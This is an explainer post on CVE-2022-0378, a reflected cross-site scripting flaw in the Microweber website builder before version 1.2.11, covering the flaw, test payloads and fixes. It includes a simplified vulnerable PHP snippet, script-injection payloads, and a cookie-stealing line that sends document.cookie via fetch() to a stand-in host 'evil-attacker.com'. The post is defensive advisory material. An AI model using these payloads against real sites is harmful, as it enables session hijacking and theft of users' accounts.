CVE-2022-0378 - Reflected Cross-Site Scripting (XSS) in Microweber < 1.2.11—How Hackers Could Exploit Your Website

Microweber is an open-source drag-and-drop website builder powered by Laravel. It's quite popular within the PHP and Laravel community, particularly for folks wanting a quick, easy CMS. But in early 2022, a serious security hole surfaced—CVE-2022-0378, a *reflected Cross-site Scripting (XSS)* vulnerability. If you're running microweber/microweber on your project and haven't updated since before version 1.2.11, read on—this could affect you or your users.

What is CVE-2022-0378?

This vulnerability allows an attacker to inject malicious JavaScript code into a page by crafting a specially formatted URL. Because the app reflects user input onto the page without proper sanitization, a user clicking such a link could have scripts run in the context of their browser. That could mean:

- Stolen cookies (authentication/session tokens)

Redirection to malicious sites

Severity (CVSS): 6.1 (Medium), but with creative exploitation, effects can be severe.

Affected package: microweber/microweber  
Vulnerable versions: Before 1.2.11

1. The Flaw

The problem lies in how Microweber handles and outputs user-supplied input in URLs (like a query parameter). For instance, suppose you have a page that reflects the value of a search parameter directly into the site’s HTML, like this:

// Vulnerable code snippet (simplified for clarity)
if (isset($_GET['search'])) {
    echo "You searched for: " . $_GET['search'];
}

If there's no sanitization or escaping, an attacker can inject HTML or JavaScript code inside search.

Say someone visits

https://your-microweber-site.com/?search=<script>alert('XSS')</script>;

If the code is vulnerable and directly reflects search, the page's output becomes

You searched for: <script>alert('XSS')</script>

And poof—a popup appears. In real attacks, hackers may attempt to steal session cookies or redirect users, not just show a popup.

Here’s how an attacker might attempt to steal a session cookie

<script>
  fetch('https://evil-attacker.com/steal?c='; + document.cookie);
</script>

If a user clicks a maliciously crafted link, their browser might silently send their cookie to the attacker's server.

Try inserting this into any input fields, forms, or URLs (as a value)

"><script>alert('CVE-2022-0378')</script>

If you see a popup when the page renders, you’re likely vulnerable.

Fixing the Vulnerability

Microweber fixed CVE-2022-0378 in version 1.2.11.

If you’re running anything older, upgrade now

composer update microweber/microweber

Also, always sanitize and escape any user-supplied data when outputting it in HTML. In PHP, you can use:

echo htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');

Frameworks like Laravel provide blade syntax that escapes by default

{{ $user_input }}

References (Original Sources)

- Packagist Advisories  
- GitHub Security Advisory about microweber  
- NVD CVE-2022-0378  

Final Thoughts & How to Stay Safe

CVE-2022-0378 is a classic reflected XSS vulnerability—simple, but potentially devastating if exploited.

Always update your dependencies, sanitize user input, and test your site for XSS with tools like

- XSS Hunter
- OWASP ZAP

If you’re running Microweber < 1.2.11, upgrade immediately. One overlooked update could cost you your reputation, data, or users’ trust. 👨‍💻👩‍💻

Timeline

Published on: 01/26/2022 16:15:00 UTC
Last modified on: 02/02/2022 16:03:00 UTC